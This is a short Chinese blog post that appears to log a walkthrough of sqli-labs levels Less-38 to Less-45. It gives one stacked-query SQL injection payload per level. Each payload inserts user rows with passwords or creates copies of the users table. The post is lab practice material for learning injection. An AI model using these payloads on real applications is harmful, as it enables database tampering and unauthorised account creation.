sqli-labs闯关记录(Less38-Less45)

这篇博客详细记录了作者在sqli-labs中的闯关经历,从Less-38到Less-45,涵盖了stacked Query的各种类型,包括Integer类型、String类型盲注、基于错误的注入等,每个关卡都提供了相应的payload示例,揭示了SQL注入攻击的不同技术和防范措施。

Less-38 stacked Query

payload:?id=1';insert into users(id,username,password) values ('15','shawn','brother')--+

在这里插入图片描述
在这里插入图片描述

Less-39 stacked Query Intiger type

payload:?id=1;insert into users(id,username,password) values ('16','shawn_16','brother')--+

在这里插入图片描述

Less-40 stacked Query String type Blind

payload:?id=1');insert into users(id,username,password) value ('17','shawn_17','brother')-- +

在这里插入图片描述

Less-41 stacked Query Intiger type blind

payload:?id=(1);insert into users(id,username,password) value ('18','shawn_18','brother')-- +

在这里插入图片描述

Less-42 Stacked Query error based

payload:c';create table shawn like users#
在这里插入图片描述

Less-43 Stacked Query

payload:c');create table shawn_43 like users#
在这里插入图片描述

Less-44 Stacked Query blind

payload:c';insert into users(id,username,password) value ('19','shawn_19','brother')#
在这里插入图片描述

Less-45 Stacked Query Blind based twist

payload:a');create table shawn_45 like users#
在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值